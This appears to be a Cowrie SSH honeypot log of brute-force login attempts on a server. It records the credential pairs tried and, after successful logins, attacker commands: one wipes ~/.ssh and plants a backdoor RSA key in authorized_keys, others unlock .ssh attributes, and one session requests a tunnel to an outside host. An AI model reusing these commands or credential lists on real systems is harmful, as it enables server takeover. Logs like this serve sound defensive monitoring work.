{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:39:28.686798Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:39:28.851487Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:28.852332Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58608,"dst_ip":"1.2.3.4","dst_port":22,"session":"272a7ac33daa","protocol":"ssh","message":"New connection: 24.108.102.132:58608 (1.2.3.4:22) [session: 272a7ac33daa]","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.012130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.022985Z","src_ip":"24.108.102.132","session":"272a7ac33daa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.190422Z","src_ip":"24.108.102.132","session":"272a7ac33daa"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":43700,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12879a7fb33","protocol":"ssh","message":"New connection: 45.159.112.103:43700 (1.2.3.4:22) [session: a12879a7fb33]","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.825842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.826733Z","src_ip":"45.159.112.103","session":"a12879a7fb33"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.866682Z","src_ip":"24.108.102.132","session":"272a7ac33daa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:39:29.935158Z","src_ip":"45.159.112.103","session":"a12879a7fb33"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Aa12345678","message":"login attempt [admin/Aa12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T00:39:30.412517Z","src_ip":"45.159.112.103","session":"a12879a7fb33"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:31.035787Z","src_ip":"24.108.102.132","session":"272a7ac33daa"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58624,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf46df80a6d7","protocol":"ssh","message":"New connection: 24.108.102.132:58624 (1.2.3.4:22) [session: bf46df80a6d7]","sensor":"my-vps","timestamp":"2025-08-26T00:39:31.186767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:39:31.197454Z","src_ip":"24.108.102.132","session":"bf46df80a6d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:39:31.364263Z","src_ip":"24.108.102.132","session":"bf46df80a6d7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:31.523280Z","src_ip":"45.159.112.103","session":"a12879a7fb33"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:39:32.028974Z","src_ip":"24.108.102.132","session":"bf46df80a6d7"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:32.190853Z","src_ip":"24.108.102.132","session":"e95d59632d86"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:32.196410Z","src_ip":"24.108.102.132","session":"bf46df80a6d7"}
{"eventid":"cowrie.session.closed","duration":31.291722297668457,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:36.050797Z","src_ip":"212.227.235.229","session":"20e71cdb9c3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47716,"dst_ip":"1.2.3.4","dst_port":22,"session":"886856210894","protocol":"ssh","message":"New connection: 212.227.235.229:47716 (1.2.3.4:22) [session: 886856210894]","sensor":"my-vps","timestamp":"2025-08-26T00:39:48.748701Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:39:48.749930Z","src_ip":"212.227.235.229","session":"886856210894"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48022,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a15394bd279","protocol":"ssh","message":"New connection: 212.227.235.229:48022 (1.2.3.4:22) [session: 0a15394bd279]","sensor":"my-vps","timestamp":"2025-08-26T00:39:48.880083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:39:48.880837Z","src_ip":"212.227.235.229","session":"0a15394bd279"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T00:39:49.012527Z","src_ip":"212.227.235.229","session":"0a15394bd279"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:39:49.410221Z","src_ip":"212.227.235.229","session":"0a15394bd279"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T00:39:49.543643Z","session":"0a15394bd279"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":47812,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ae7f81025d5","protocol":"ssh","message":"New connection: 36.89.28.139:47812 (1.2.3.4:22) [session: 4ae7f81025d5]","sensor":"my-vps","timestamp":"2025-08-26T00:40:10.168879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:10.169824Z","src_ip":"36.89.28.139","session":"4ae7f81025d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:10.964739Z","src_ip":"36.89.28.139","session":"4ae7f81025d5"}
{"eventid":"cowrie.login.failed","username":"moein","password":"moein","message":"login attempt [moein/moein] failed","sensor":"my-vps","timestamp":"2025-08-26T00:40:12.136023Z","src_ip":"36.89.28.139","session":"4ae7f81025d5"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:13.328197Z","src_ip":"36.89.28.139","session":"4ae7f81025d5"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":35672,"dst_ip":"1.2.3.4","dst_port":22,"session":"3682a492971c","protocol":"ssh","message":"New connection: 27.112.78.245:35672 (1.2.3.4:22) [session: 3682a492971c]","sensor":"my-vps","timestamp":"2025-08-26T00:40:18.023253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:18.024571Z","src_ip":"27.112.78.245","session":"3682a492971c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:18.289673Z","src_ip":"27.112.78.245","session":"3682a492971c"}
{"eventid":"cowrie.login.failed","username":"roota","password":"roota","message":"login attempt [roota/roota] failed","sensor":"my-vps","timestamp":"2025-08-26T00:40:19.397897Z","src_ip":"27.112.78.245","session":"3682a492971c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:20.664848Z","src_ip":"27.112.78.245","session":"3682a492971c"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":37704,"dst_ip":"1.2.3.4","dst_port":22,"session":"c160c6df8487","protocol":"ssh","message":"New connection: 24.108.102.132:37704 (1.2.3.4:22) [session: c160c6df8487]","sensor":"my-vps","timestamp":"2025-08-26T00:40:33.339788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:33.350425Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:33.512856Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":41906,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb8643aab3b3","protocol":"ssh","message":"New connection: 45.159.112.103:41906 (1.2.3.4:22) [session: fb8643aab3b3]","sensor":"my-vps","timestamp":"2025-08-26T00:40:33.873441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:33.875169Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:33.975657Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.login.success","username":"root","password":"ZTE@uss100","message":"login attempt [root/ZTE@uss100] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.161518Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.login.success","username":"root","password":"abc@123456","message":"login attempt [root/abc@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.420482Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:40:34.546542Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.547328Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.548244Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:40:34.664269Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.664944Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.665959Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.714588Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:34.767574Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:40:35.075502Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
